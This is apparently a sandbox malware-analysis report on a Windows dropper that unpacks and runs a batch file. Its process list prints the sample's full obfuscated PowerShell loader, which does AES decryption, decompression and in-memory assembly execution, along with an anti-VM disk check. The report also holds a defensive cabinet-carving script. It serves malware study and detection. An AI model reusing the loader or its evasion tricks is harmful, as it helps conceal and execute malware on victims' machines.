                            SHA1:A36747AF15236F95C768C42327CC5DCAD9982EFD
                            SHA-256:767A7C28A499E2029D76314C77D1B744D544F27E1B9D682A9673B8A3DDF7F017
                            SHA-512:C22DA90301859AE3F057CCA1E7D31946F43C65BC741AA7A77E4233946F0178DC60CD8B112425AF8B3C72877336B7826174A76CBC0C8E0B2E760CDCA338943085
                            Malicious:false
                            Preview:Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\AppData\Local\Temp\IXP000.TMP> function FpxON($kXGHT){.$MjRuR=[System.Security.Cryptography.Aes]::Create();.$MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU=');.$MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ==');.$WVvmF=$MjRuR.CreateDecryptor();.$CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length);.$WVvmF.Dispose();.$MjRuR.Dispose();.$CVTyC;}function ogptr($kXGHT){.Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', '');.Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.Mblckeblckmblcko
                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                            Entropy (8bit):7.979186304025851
                            TrID:
                            • Win64 Executable GUI (202006/5) 92.65%
                            • Win64 Executable (generic) (12005/4) 5.51%
                            • Generic Win/DOS Executable (2004/3) 0.92%
                            • DOS Executable Generic (2002/1) 0.92%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:XgKnAQpuPM.exe
                            File size:3'571'712 bytes
                            MD5:52c1acdcbb715dd099648b26b98254e8
                            SHA1:e3cd07adc9d8fe7c2fbb07730845af6555af2e66
                            SHA256:8dc774bd289aeb18dee994fea6e69039d9c6e77a1b90a0d9db004109735ef3f9
                            SHA512:cb1890dc136ae86c6ae8110fa026eb23b77b580345c8e7f47cf7233f888e5d729dfad8519c4c8c330eb2d4ed6a7209739d46fb19853e0d6ea13d595b43a3d24a
                            SSDEEP:98304:5M9/CPPgsG6SHkwvbyQsJFV5Z1QvI69gA5PlVkhh9:5MhOPy6SHxy1VbrKgAXy
                            TLSH:6AF5334957F660D2E0AE1331C99745C74E32B9620F39489B43E948BF2B733C4A171FAA
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Kr..%!..%!..%!&. ..%!&.& ..%!&.! ..%!&.$ ..%!..$!b.%!&.- ..%!&..!..%!&.' ..%!Rich..%!................PE..d....y............"
                            Icon Hash:3b6120282c4c5a1f
                            Entrypoint:0x140008460
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x140000000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Time Stamp:0xE28C79B4 [Sun Jun 11 09:36:52 2090 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:10
                            OS Version Minor:0
                            File Version Major:10
                            File Version Minor:0
                            Subsystem Version Major:10
                            Subsystem Version Minor:0
                            Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1
Instruction
sub rsp, 28h
call 00007F6C0CFE1AC0h
add rsp, 28h
jmp 00007F6C0CFE133Bh
int3
int3
int3
int3
int3
int3
mov qword ptr [rsp+08h], rbx
mov qword ptr [rsp+10h], rdi
push r14
sub rsp, 000000B0h
and dword ptr [rsp+20h], 00000000h
lea rcx, [rsp+40h]
call qword ptr [00000F8Dh]
nop
mov rax, qword ptr [00000030h]
mov rbx, qword ptr [rax+08h]
xor edi, edi
xor eax, eax
cmpxchg qword ptr [000046C2h], rbx
je 00007F6C0CFE133Ch
cmp rax, rbx
jne 00007F6C0CFE134Fh
mov edi, 00000001h
mov eax, dword ptr [000046B8h]
cmp eax, 01h
jne 00007F6C0CFE134Ch
lea ecx, [rax+1Eh]
call 00007F6C0CFE1953h
jmp 00007F6C0CFE13B9h
mov ecx, 000003E8h
call qword ptr [00000F3Bh]
jmp 00007F6C0CFE12F6h
mov eax, dword ptr [00004693h]
test eax, eax
jne 00007F6C0CFE1395h
mov dword ptr [00004685h], 00000001h
lea r14, [000011BEh]
lea rbx, [0000119Fh]
mov qword ptr [rsp+30h], rbx
mov dword ptr [rsp+24h], eax
cmp rbx, r14
jnc 00007F6C0CFE1361h
test eax, eax
jne 00007F6C0CFE1361h
cmp qword ptr [rbx], 00000000h
je 00007F6C0CFE134Ch
mov r10, 5E523070h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa2b4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0x358bcc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xe000 | 0x42c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x368000 | 0x2c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9a68 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9010 | 0x138 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9148 | 0x520 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x7e40 | 0x8000 | d22d8a48c14d2185814d2ed24fb0aed1 | False | 0.546173095703125 | data | 6.092855112591348 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x2340 | 0x3000 | 3748ff8966297360bdba725e2d585c23 | False | 0.318359375 | data | 3.84344715350442 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x1f00 | 0x1000 | f198899505f620007167379f74f8141c | False | 0.083251953125 | data | 1.0384025678015962 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0xe000 | 0x42c | 0x1000 | 2d9ecb32a70228f2b07b654e216a79ee | False | 0.156005859375 | data | 1.4378876073270839 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xf000 | 0x359000 | 0x359000 | bf7df857719ee06de74c7dc0e33f055c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x368000 | 0x2c | 0x1000 | cf22972a59e8c2a2ad0453d649f2025d | False | 0.017578125 | data | 0.10781936458684958 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
AVI | 0xf9f8 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States | 0.2713099474665311
RT_ICON | 0x12814 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3225609756097561
RT_ICON | 0x12e7c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.41263440860215056
RT_ICON | 0x13164 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.4569672131147541
RT_ICON | 0x1334c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5574324324324325
RT_ICON | 0x13474 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.6223347547974414
RT_ICON | 0x1431c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.7369133574007221
RT_ICON | 0x14bc4 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.783410138248848
RT_ICON | 0x1528c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.3829479768786127
RT_ICON | 0x157f4 | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.0004662673505254
RT_ICON | 0x231c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5300829875518672
RT_ICON | 0x25770 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.6137429643527205
RT_ICON | 0x26818 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.703688524590164
RT_ICON | 0x271a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.425531914893617
RT_DIALOG | 0x27608 | 0x2f2 | data | English | United States | 0.4389920424403183
RT_DIALOG | 0x278fc | 0x1b0 | data | English | United States | 0.5625
RT_DIALOG | 0x27aac | 0x166 | data | English | United States | 0.5223463687150838
RT_DIALOG | 0x27c14 | 0x1c0 | data | English | United States | 0.5446428571428571
RT_DIALOG | 0x27dd4 | 0x130 | data | English | United States | 0.5526315789473685
RT_DIALOG | 0x27f04 | 0x120 | data | English | United States | 0.5763888888888888
RT_STRING | 0x28024 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States | 0.6214285714285714
RT_STRING | 0x280b0 | 0x520 | data | English | United States | 0.4032012195121951
RT_STRING | 0x285d0 | 0x5cc | data | English | United States | 0.36455525606469
RT_STRING | 0x28b9c | 0x4b0 | data | English | United States | 0.385
RT_STRING | 0x2904c | 0x44a | data | English | United States | 0.3970856102003643
RT_STRING | 0x29498 | 0x3ce | data | English | United States | 0.36858316221765913
RT_RCDATA | 0x29868 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x29870 | 0x33d638 | Microsoft Cabinet archive data, Windows 2000/XP setup, 3397176 bytes, 1 file, at 0x2c +A "vclib.bat", ID 885, number 1, 157 datablocks, 0x1503 compression | English | United States | 0.9999542236328125
RT_RCDATA | 0x366ea8 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x366eac | 0x24 | data | English | United States | 0.8611111111111112
RT_RCDATA | 0x366ed0 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x366ed8 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x366ee0 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x366ee4 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x366eec | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x366ef0 | 0x13 | ASCII text, with no line terminators | English | United States | 1.4210526315789473
RT_RCDATA | 0x366f04 | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x366f08 | 0x6 | data | English | United States | 2.3333333333333335
RT_RCDATA | 0x366f10 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_RCDATA | 0x366f18 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143
RT_GROUP_ICON | 0x366f20 | 0xbc | data | English | United States | 0.6117021276595744
RT_VERSION | 0x366fdc | 0x408 | data | English | United States | 0.42248062015503873
RT_MANIFEST | 0x3673e4 | 0x7e6 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.37734915924826906
DLL | Import
ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
GDI32.dll | GetDeviceCaps
USER32.dll | ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
msvcrt.dll | ?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
COMCTL32.dll |
Cabinet.dll |
VERSION.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
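
The resource table lists one RT_RCDATA entry that is a 3,397,176-byte Microsoft Cabinet holding a single file, "vclib.bat", and the import table shows the dropper pulling in Cabinet.dll alongside FindResource/LoadResource/CreateProcessA: the executable is a self-extracting wrapper whose only job is to unpack that cabinet into a temp directory and run the batch file (the process list below shows exactly that: cmd /c "vclib.bat"). The following is an added example written for this page, not the report's or the sample's code. It locates the cabinet in the file by its CFHEADER, carves it out, expands it with Windows' own expand.exe, and checks the result against the sizes and the vclib.bat MD5 the report gives. $SamplePath and $OutDir are assumptions.

```powershell
# Inputs (assumptions): where the sample sits and where to write the carved pieces.
$SamplePath = "$env:USERPROFILE\Desktop\XgKnAQpuPM.exe"
$OutDir     = "$env:TEMP\XgKnAQpuPM_carved"

# Values copied from the report purely to cross-check the carve.
$ReportCabSize = 0x33d638                              # RT_RCDATA resource size
$ReportBatMd5  = '48091A17649D5BE43A163572BF795E92'    # dropped vclib.bat MD5
$ReportBatSize = 5120251                               # dropped vclib.bat size

# CFHEADER layout: 'MSCF'(0) reserved(4) cbCabinet(8) reserved(12) coffFiles(16) reserved(20)
#                  versionMinor(24) versionMajor(25) cFolders(26) cFiles(28) ...  36 bytes total.
function Find-Cabinets {
    param([byte[]]$Bytes)
    # Latin-1 maps each byte to one char, so a string search is byte-exact and fast.
    $text = [System.Text.Encoding]::GetEncoding('iso-8859-1').GetString($Bytes)
    $pos = 0
    while (($pos = $text.IndexOf('MSCF', $pos, [System.StringComparison]::Ordinal)) -ge 0) {
        if ($pos + 36 -le $Bytes.Length) {
            $cb    = [BitConverter]::ToUInt32($Bytes, $pos + 8)
            $minor = $Bytes[$pos + 24]; $major = $Bytes[$pos + 25]
            $files = [BitConverter]::ToUInt16($Bytes, $pos + 28)
            # Reject stray 'MSCF' byte runs: real cabinets are version 1.3 and fit inside the file.
            if ($major -eq 1 -and $minor -eq 3 -and $cb -gt 36 -and ($pos + $cb) -le $Bytes.Length) {
                [pscustomobject]@{ Offset = $pos; Size = [int]$cb; Files = $files }
            }
        }
        $pos += 4
    }
}

New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
$bytes = [System.IO.File]::ReadAllBytes($SamplePath)
$cabs  = @(Find-Cabinets -Bytes $bytes)
if ($cabs.Count -eq 0) { throw "no cabinet header found in $SamplePath" }

foreach ($cab in $cabs) {
    # Copy the cabinet bytes out without going through a PowerShell object[] slice.
    $cabPath = Join-Path $OutDir ('carved_{0:x8}.cab' -f $cab.Offset)
    $slice   = New-Object byte[] $cab.Size
    [Array]::Copy($bytes, $cab.Offset, $slice, 0, $cab.Size)
    [System.IO.File]::WriteAllBytes($cabPath, $slice)
    'cabinet at file offset 0x{0:x}: {1} bytes, {2} file(s); report says {3} bytes' -f $cab.Offset, $cab.Size, $cab.Files, $ReportCabSize

    # expand.exe ships with Windows and handles the LZX (0x1503) compression the report lists.
    $dest = Join-Path $OutDir ('expanded_{0:x8}' -f $cab.Offset)
    New-Item -ItemType Directory -Force -Path $dest | Out-Null
    & "$env:WINDIR\System32\expand.exe" $cabPath '-F:*' $dest | Out-Null

    foreach ($f in Get-ChildItem -Path $dest -File) {
        $md5   = (Get-FileHash -Path $f.FullName -Algorithm MD5).Hash
        $match = ($md5 -eq $ReportBatMd5 -and $f.Length -eq $ReportBatSize)
        '  {0}: {1} bytes, MD5 {2}, matches report: {3}' -f $f.Name, $f.Length, $md5, $match
    }
}
```

The carve is independent of the section and resource tables (it keys on the cabinet's own header), so it works on repacked variants where the RVA differs; the version and size checks keep random MSCF byte runs inside the LZX data from producing bogus candidates. The expanded file is the batch stage the next section's dropped-file entry describes, and nothing from the sample has to execute to obtain it.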
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 00:29:33.295130014 CEST | 53 | 55731 | 162.159.36.2 | 192.168.2.8
Oct 8, 2024 00:29:33.764405966 CEST | 60256 | 53 | 192.168.2.8 | 1.1.1.1
Oct 8, 2024 00:29:33.772066116 CEST | 53 | 60256 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 8, 2024 00:29:33.764405966 CEST | 192.168.2.8 | 1.1.1.1 | 0xa91 | Standard query (0) | 198.187.3.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 00:29:33.772066116 CEST | 1.1.1.1 | 192.168.2.8 | 0xa91 | Name error (3) | 198.187.3.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false

                            Target ID:0
                            Start time:18:29:04
                            Start date:07/10/2024
                            Path:C:\Users\user\Desktop\XgKnAQpuPM.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\XgKnAQpuPM.exe"
                            Imagebase:0x7ff776d10000
                            File size:3'571'712 bytes
                            MD5 hash:52C1ACDCBB715DD099648B26B98254E8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:2
                            Start time:18:29:05
                            Start date:07/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c "vclib.bat"
                            Imagebase:0x7ff7d9ae0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:3
                            Start time:18:29:05
                            Start date:07/10/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6ee680000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:18:29:05
                            Start date:07/10/2024
                            Path:C:\Windows\System32\wbem\WMIC.exe
                            Wow64 process (32bit):false
                            Commandline:wmic diskdrive get Model
                            Imagebase:0x7ff615920000
                            File size:576'000 bytes
                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:5
                            Start time:18:29:05
                            Start date:07/10/2024
                            Path:C:\Windows\System32\findstr.exe
                            Wow64 process (32bit):false
                            Commandline:findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A"
                            Imagebase:0x7ff6add80000
                            File size:36'352 bytes
                            MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:6
                            Start time:18:29:07
                            Start date:07/10/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 
'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] (''));
                            Imagebase:0x7ff7d9ae0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:7
                            Start time:18:29:07
                            Start date:07/10/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell.exe -WindowStyle Hidden
                            Imagebase:0x7ff6cb6b0000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2185544424.000001C6916F8000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2029388668.000001C68BEA1000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2185544424.000001C691B00000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2185544424.000001C690CF8000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high
                            Has exited:true

                            Target ID:10
                            Start time:18:29:13
                            Start date:07/10/2024
                            Path:C:\Windows\System32\WerFault.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\WerFault.exe -u -p 3352 -s 1576
                            Imagebase:0x7ff6a78f0000
                            File size:570'736 bytes
                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:12
                            Start time:18:29:15
                            Start date:07/10/2024
                            Path:C:\Windows\System32\rundll32.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                            Imagebase:0x7ff6b7a40000
                            File size:71'680 bytes
                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true


                              Execution Graph

                              Execution Coverage:24.2%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:39.7%
                              Total number of Nodes:879
                              Total number of Limit Nodes:23
                              execution_graph: serialized node/edge data of the interactive execution graph (function nodes at 0x7ff776d1xxxx addresses in the sample's image, each annotated with the Win32 APIs it resolves to, e.g. CreateFileA, CreateMutexA, RegOpenKeyExA, RegSetValueExA, DecryptFileA, CreateProcessA, AdjustTokenPrivileges, ExitWindowsEx, SetUnhandledExceptionFilter). The rendered graph is not reproduced here; the node list is truncated on this page.
